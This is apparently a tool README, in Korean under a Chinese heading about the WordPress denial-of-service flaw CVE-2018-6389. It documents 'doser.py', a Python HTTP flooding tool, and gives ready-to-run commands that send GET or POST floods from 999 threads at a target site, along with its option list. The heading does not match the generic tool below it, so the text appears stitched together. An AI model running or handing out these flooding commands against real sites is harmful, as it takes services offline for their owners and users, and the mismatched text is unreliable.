
CVE-2018-6389: WordPress <= 4.9.x 拒绝服务(DOS)漏洞
Python으로 작성된 HTTP 요청용 DoS 도구 (hulk에서 영감을 받았지만 더 많은 기능을 갖춤):
999개의 스레드가 GET 요청을 보냅니다:
python doser.py -t 999 -g 'https://targeted.site.com'
999개의 스레드가 JSON 데이터를 포함한 POST 요청을 보냅니다:
python doser.py -t 999 -p 'https://targeted.site.com' -ah 'Content-Type: application/json' -d '{"json": "payload"}'
usage: doser.py [-h] [-g G] [-p P] [-d D] [-ah AH] [-t T]
선택적 인수:
-h, --help 도움말 메시지를 표시하고 종료합니다
-g GET 요청을 지정합니다. 사용법: -g '< url >'
-p POST 요청을 지정합니다. 사용법: -p '< url >'
-d POST 요청에 대한 데이터 페이로드를 지정합니다
-ah 추가 헤더를 지정합니다
-t 사용할 스레드 수를 지정합니다
Golang으로 다시 작성 :)